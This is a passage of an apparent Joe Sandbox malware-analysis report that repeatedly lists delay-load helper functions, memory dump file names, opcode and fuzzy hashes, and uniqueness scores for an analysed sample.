                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 106e5ba65f43005b23c8fdd10218e92fb014a96b708cca7f056e1d74e1ae0969
                  • Instruction ID: b7dd83bbc15bdea154a4b5e3ad88ee96f281687be70daeb3f7ac00d5ebe364a4
                  • Opcode Fuzzy Hash: 106e5ba65f43005b23c8fdd10218e92fb014a96b708cca7f056e1d74e1ae0969
                  • Instruction Fuzzy Hash: 71B0129666D1057C314861046C56E3B261CE5C1B21330401AB809D40C2D5409C893532
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a00432666f9b39f1b00fd4575619744578c1f38a161de761311e934092723b2d
                  • Instruction ID: 9f8d5b9e648d212236911b07b4b897e3b8a14bbe204a8c02878ba4d9980e821c
                  • Opcode Fuzzy Hash: a00432666f9b39f1b00fd4575619744578c1f38a161de761311e934092723b2d
                  • Instruction Fuzzy Hash: D1B0129666C3017C354821006C66D3B261CC5C1B25330456BB809E40C2D5409CCD7432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 2d53b98f3467c7411c5001a5932c3f21581ba78fac52281236108d51cf42f396
                  • Instruction ID: f53b9f04c7e6cc920cd1800099de891c8fc0f96675848a8a881ca8b0841422f1
                  • Opcode Fuzzy Hash: 2d53b98f3467c7411c5001a5932c3f21581ba78fac52281236108d51cf42f396
                  • Instruction Fuzzy Hash: D5B012A226C0017C314C61046D16E36269CC5C1B21730401AB809D40C2D6409C8E3432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 091d1fd32c0ed5fd3343b29dc834e4dde6995c35ff2ff4aa1b2ae54c0de93d86
                  • Instruction ID: b749e8843fc32893956611b6cd999b8f5118db1c1e9fa90df074bffb04517e6a
                  • Opcode Fuzzy Hash: 091d1fd32c0ed5fd3343b29dc834e4dde6995c35ff2ff4aa1b2ae54c0de93d86
                  • Instruction Fuzzy Hash: 5EB0129227E0017C314861046C56E3A265DC9C1B21730401AB809D40C2D5409C893432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a564f63002bd1c02cba69d6dc8d7f14c69decb6da240ceddf04ada526912dcca
                  • Instruction ID: d127577689a6e1ec607657ec8fcedd138cada320fc99f3fb8cbf103a1e6887bb
                  • Opcode Fuzzy Hash: a564f63002bd1c02cba69d6dc8d7f14c69decb6da240ceddf04ada526912dcca
                  • Instruction Fuzzy Hash: 93B0129226C0017C314861146C16E36265CC5C2B21330801ABD09D40C2D7409C893432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 61173eed5db2e5339cbb23f96f72a8f84e86e9d7a0d54ad7c3d500ae3a0e46dc
                  • Instruction ID: 7e6347e5c99d7c4790719e7a375b37c517e5fcbba74f662d51652419048da2ff
                  • Opcode Fuzzy Hash: 61173eed5db2e5339cbb23f96f72a8f84e86e9d7a0d54ad7c3d500ae3a0e46dc
                  • Instruction Fuzzy Hash: E7B012A226D1017C318862046C56E36261DC5C1B21730411BB809D40C2D5409CC93432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: f32351af707130a9ebe551547dff5b3ffa4bf4ed33039bb9bf9c8e7b534376b4
                  • Instruction ID: a669946d014dfa4e3d01c1322d8e112967981b6170cada9c15965dd28c6b2679
                  • Opcode Fuzzy Hash: f32351af707130a9ebe551547dff5b3ffa4bf4ed33039bb9bf9c8e7b534376b4
                  • Instruction Fuzzy Hash: F8B0129226D0017C314861046C56E36261DC5C2B21730801ABC09D40C2D5409C893432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 69d051af2567a876c5f37c9f46a8565ad02e81f8765ed98954900c3254f39f67
                  • Instruction ID: 25ea1bad10979aecb8f863a4da3bff511ef30fba4d36233b39256bb6d3850187
                  • Opcode Fuzzy Hash: 69d051af2567a876c5f37c9f46a8565ad02e81f8765ed98954900c3254f39f67
                  • Instruction Fuzzy Hash: F4B0129226D0017C314C71066C12F3E264CC0C5B20330851BB809C4147D4488C4F7432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 7583ae6ee88c0c32668c5da01b708db58f52b66861f93f028a636f2aedd86b9a
                  • Instruction ID: 22d6a9b4fbfa5a118884c370a458442c8c31de6229cf97e95ac22af828a70c72
                  • Opcode Fuzzy Hash: 7583ae6ee88c0c32668c5da01b708db58f52b66861f93f028a636f2aedd86b9a
                  • Instruction Fuzzy Hash: A8B012A226C001BC314C71056C12E3A264CC0C0B20330C11BBC09C4157E44C8C4A7432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 218333c29683e672c0c1867557452b11713a0830343f9fe38ec622775d4d1bc2
                  • Instruction ID: de745046bec05d83ef3a7bd5f70d51b1da9b60a6aee3217d66b51e0ae491fe5c
                  • Opcode Fuzzy Hash: 218333c29683e672c0c1867557452b11713a0830343f9fe38ec622775d4d1bc2
                  • Instruction Fuzzy Hash: C0B0129636C0077C314C52042D17E372A1CC0C0F20330801FB909C0042DA428C4D7132
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4dd6f709a81a659004b78c4c06783e07ef4f40f6b5dbefe2e0f033feb28baa11
                  • Instruction ID: ee28b2c798c2324a6b6f8615471fabc1476c775519c75c249a93006dc2f90f71
                  • Opcode Fuzzy Hash: 4dd6f709a81a659004b78c4c06783e07ef4f40f6b5dbefe2e0f033feb28baa11
                  • Instruction Fuzzy Hash: 2BB0129636C007BC314C52042C17E37262CC0C0F20330801FBC09C1042DA418C4C7132
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: ef1c8ce70197ccc874ad88a907d5d7e91f8f96a54ed367831a95dc4520b48bb9
                  • Instruction ID: 1ef706a181204e52b5e99f13c70be2b12e5a0ad2c2a739275814411734e91491
                  • Opcode Fuzzy Hash: ef1c8ce70197ccc874ad88a907d5d7e91f8f96a54ed367831a95dc4520b48bb9
                  • Instruction Fuzzy Hash: F6B0129A36D0067C314852142C17F36261CD0C0F20330402FB90AC0442DA408C4C7132
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: cb94c1e51f65eb4a7cc5f0790cd7cfc510579868825ca9b6a41fdca4a9c48d7d
                  • Instruction ID: 8f2109c657ec56a3dab7968d7aebf1266421ac324fc9fef9e7438eb5d87575c2
                  • Opcode Fuzzy Hash: cb94c1e51f65eb4a7cc5f0790cd7cfc510579868825ca9b6a41fdca4a9c48d7d
                  • Instruction Fuzzy Hash: 9AB0129637C10B7C324C12002C17D37261CC0C0F20330412FB805D0042DA418C8C7032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: ef0bac8c47b25dd7b6f9168a9c1ceec3a43aac91cad04035e59ef3b9b6cc86bf
                  • Instruction ID: e68ba2fa160ce2d5f5046ef566db30e6e8894125ba5615fd1a404de99b208f46
                  • Opcode Fuzzy Hash: ef0bac8c47b25dd7b6f9168a9c1ceec3a43aac91cad04035e59ef3b9b6cc86bf
                  • Instruction Fuzzy Hash: C9B012922AD1057C714C71056C12F3A264CE0C0B20330421BB809C414BD4488C4A7532
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DC36
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 502344ba8ec1f8ba7b0fb3a795963eae7902f11ea439fec85331ac359480a1fe
                  • Instruction ID: a11d1a06bd8bac456477752fee3d71fa0e3804f58b8246faba8faef5c19a87c3
                  • Opcode Fuzzy Hash: 502344ba8ec1f8ba7b0fb3a795963eae7902f11ea439fec85331ac359480a1fe
                  • Instruction Fuzzy Hash: EAB0129666C101BC314C61046C22E36372CC1C5B20330851BBE09D0143E5849C887032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DC36
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
